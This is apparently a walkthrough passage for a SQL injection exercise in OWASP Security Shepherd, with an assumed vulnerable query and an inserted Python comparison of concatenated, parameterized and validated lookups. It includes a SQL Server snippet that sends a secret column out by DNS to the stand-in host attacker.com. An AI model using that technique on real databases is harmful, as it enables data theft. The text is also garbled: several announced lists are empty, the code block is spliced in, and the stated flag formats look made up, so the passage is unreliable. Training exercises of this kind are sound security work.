Once you successfully extract the data, the flag for Security Shepherd Challenge 5 usually follows the format:
OSWE-<Random_Hash> or shepherd_<alphanumeric>.
Example found in walkthroughs: OSWE-5d41402abc4b2a76b9719d911017c592
You will notice the keyword "new" appearing frequently in search queries. Historically, earlier versions of Security Shepherd (pre-2021) had a relatively straightforward SQLi in Challenge 5. However, the "new" iteration—updated for modern OWASP Top 10 compliance—introduced three critical changes:
These changes force the attacker to use blind, boolean-based, case-shifted injection.
Challenge 5 usually requires a UNION-Based injection or a Blind injection, depending on how the backend handles errors.
Let’s assume the underlying query is:
SELECT first_name, last_name FROM user_data WHERE user_id = ' + userInput + '
To prevent this attack:
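The assumed query above, rebuilt with bound parameters and an allow-list check, as an added example that is not Security Shepherd's own code. It uses Python's sqlite3 with constructed sample rows, and the function names are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed sample data; table and column names follow the assumed query.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user_data "
               "(user_id TEXT PRIMARY KEY, first_name TEXT, last_name TEXT)")
    db.executemany("INSERT INTO user_data VALUES (?, ?, ?)", [
        ("101", "Alice", "Archer"),
        ("102", "Bob", "Baker"),
        ("103", "Carol", "Clark"),
    ])
    return db

def lookup_concatenated(db, user_input):
    # Vulnerable form: the input becomes part of the SQL text, so a quote
    # character in it changes the structure of the statement.
    query = ("SELECT first_name, last_name FROM user_data "
             "WHERE user_id = '" + user_input + "'")
    return db.execute(query).fetchall()

def lookup_parameterized(db, user_input):
    # Hardened form: the statement text is fixed and the input is bound as a
    # value, so it is only ever compared against user_id.
    query = "SELECT first_name, last_name FROM user_data WHERE user_id = ?"
    return db.execute(query, (user_input,)).fetchall()

def lookup_validated(db, user_input):
    # Defence in depth: reject anything that is not a short ASCII number
    # before the database is touched at all.
    if not (user_input.isascii() and user_input.isdigit()
            and len(user_input) <= 10):
        raise ValueError("user_id must be 1 to 10 digits")
    return lookup_parameterized(db, user_input)

def outcome(lookup, db, user_input):
    # Return the rows, or the exception class name if the lookup failed.
    try:
        return lookup(db, user_input)
    except (sqlite3.Error, ValueError) as exc:
        return type(exc).__name__

if __name__ == "__main__":
    db = make_db()
    for value in ["101", "O'Brien", "' OR '1'='1"]:  # constructed inputs
        for fn in (lookup_concatenated, lookup_parameterized, lookup_validated):
            print(f"{fn.__name__:22} {value!r:16} -> {outcome(fn, db, value)}")
```

The concatenated lookup either raises a database error or returns every row for the quoted inputs, while the parameterized lookup returns an empty result for both and the validated one rejects them before any SQL runs.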
xp_dnsresolve is a SQL Server extended stored procedure that resolves a domain name to an IP address. It makes a DNS lookup.
Attack mechanics:
Example:
DECLARE @data varchar(8000);
SELECT @data = (SELECT TOP 1 secret_column FROM secrets_table);
EXEC xp_dnsresolve @data + '.attacker.com';
Now we attempt a UNION SELECT to see where data is reflected on the screen.
If the challenge is a login form, you might need to use specific column names (like username and password) or simply rely on the numeric placeholders.